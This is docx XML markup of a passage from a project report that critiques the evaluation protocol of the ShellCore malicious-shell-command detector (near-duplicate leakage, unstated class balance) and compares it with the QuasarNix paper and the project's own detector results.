        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Reject — the evaluation protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: reject, and this is the largest departure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The elements above concern representation; this one concerns whether any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reported number means what it appears to mean, and it is where our design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>diverges most sharply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore evaluates with plain 10-fold cross-validation over 178,261 commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>extracted statically from 2,891 binaries of a small number of botnet families.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>No deduplication is reported, and no grouping constraint. Commands recovered by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>applying the same 1,273 regex patterns across thousands of related samples must</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>contain heavy near-duplication, and unconstrained folding then places</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>near-identical strings on both sides of the split. Our build reduces every</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>command to a structural skeleton and assigns whole shape groups to one side —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>zero groups straddle either split, verified on the current build — precisely so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that test recall cannot be recall on a variant already seen (Chapter 1.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Second, the paper reports accuracy, F1, FNR and FPR without stating the class</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>balance of the evaluated set, and the balance cannot be recovered from the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>paper: Table 2's totals imply 178,261 malicious against 1,635,650 benign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(9.83% prevalence), while Table 5 gives the command-level dataset as 190,897</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rows. Those two accountings differ by a factor of nine and cannot both describe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the headline experiment. Section 2.3 resolves which one the reported metrics are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>actually consistent with, and shows why the answer changes how the 99.87 should</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>be read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Our reporting rule follows from that difficulty rather than from virtue: every</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>F1 in this report is quoted against the do-nothing floor for the prevalence it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">was measured at — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at our 25% prevalence — and no headline number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>appears without it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Summary of verdicts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ShellCore element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Basis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Character-level representation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Adopt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (re-encoded + retained raw)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Their Table 4 ablation: 1.6% degradation vs 32 points for term-level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Two-representation architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Adopt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (fused, not parallel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Measured: hybrid 0.8761 vs engineered-only 0.7856 on D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Term-level learned BoW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Modify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> → fixed threat-mapped lists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Their 99→67 collapse shows the vocabulary encoded the corpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n-grams (1–5, unbounded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Modify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> → char 3–5, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_features=3000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, in-fold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dimensionality control without PCA; leakage safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PCA (99.9% variance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chapter 4 requires rankable, nameable features</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Plain 10-fold CV, unstated balance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Near-duplication across statically-extracted samples; F1 is uninterpretable without its floor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 2.3 — Comparative Analysis: the ShellCore Contribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>**Contribution block for the comparative essay (Ben drafts the combined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>section).** This supplies the ShellCore vertex and the head-to-head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>arithmetic; Ben supplies the QuasarNix/LotL vertex and the joining argument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>The reconstruction in the second section is original to this report and is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>quantitative basis for Chapter 8.3 — that chapter cites these numbers rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>than re-deriving them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Where the two papers sit, and where we sit between them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The two works we compare against are solving different problems with the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>raw material, and this project's design is legible as a choice between them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ShellCore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Alasmary et al., IEEE IoT-J 2022) is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>representation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> paper. Its</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>contribution is the demonstration that a shell command string, encoded at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>character level, is sufficient to detect IoT malware — and that the character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>encoding is the one that survives when the benign corpus is taken away. It</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>carries no hand-engineered behavioural features, no threat-model mapping, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>after PCA no interpretable feature space at all. Its evaluation is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>in-distribution, single-corpus, and reported as accuracy first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>QuasarNix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Trizna et al., 2024, arXiv:2402.18329) is an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>evaluation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> paper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>It is LotL-specific rather than malware-specific, it addresses data scarcity by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>synthesising attack commands rather than harvesting them, and — the part this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>project borrowed most directly — it insists on reporting at industrially</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>meaningful operating points, low fixed false-positive rates rather than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>headline accuracy, and on adversarial robustness as a first-class result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>This project sits deliberately between them: **ShellCore's representational</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>insight, re-encoded as QuasarNix-style behaviour-aware interpretable features,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and evaluated under a protocol stricter than either** — shape-grouped splits, a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>stated do-nothing floor on every F1, a second corpus sharing no source with the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>first, and a TPR-at-fixed-FPR operating point (0.5669 at FPR = 0.1% on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 1). Chapters 5.2 and 8.2 exist because neither comparator reports what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>happens when the corpus changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sourcing note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the assigned "Trizna (2022) ACM TOPS" reference could not be</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>located; QuasarNix is named instead as the verifiable LotL comparator. See</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch2_literature_review.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What ShellCore's 99.87 actually measures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ShellCore's headline is F1 = 99.87 at the command level. Before that can be set</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>beside our 0.8761 it has to be established what quantity it is, because the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>paper's own numbers do not permit the obvious reading.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Table 2 gives 178,261 malicious commands against 1,635,650 benign — a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">prevalence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9.83%</w:t>
      </w:r>
      <w:r>
        <w:t>. Table 5 gives the command-level dataset as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>190,897</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rows. Those differ by a factor of nine and cannot both describe the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>headline experiment, and the class balance is never stated in the text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The reported triples are over-determined, so the question can be settled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>arithmetically. Recall is fixed by the reported FNR; precision then depends only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on prevalence; F1 follows. Testing four candidate readings against all six</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>command-level rows: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reading of the "F-1" column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
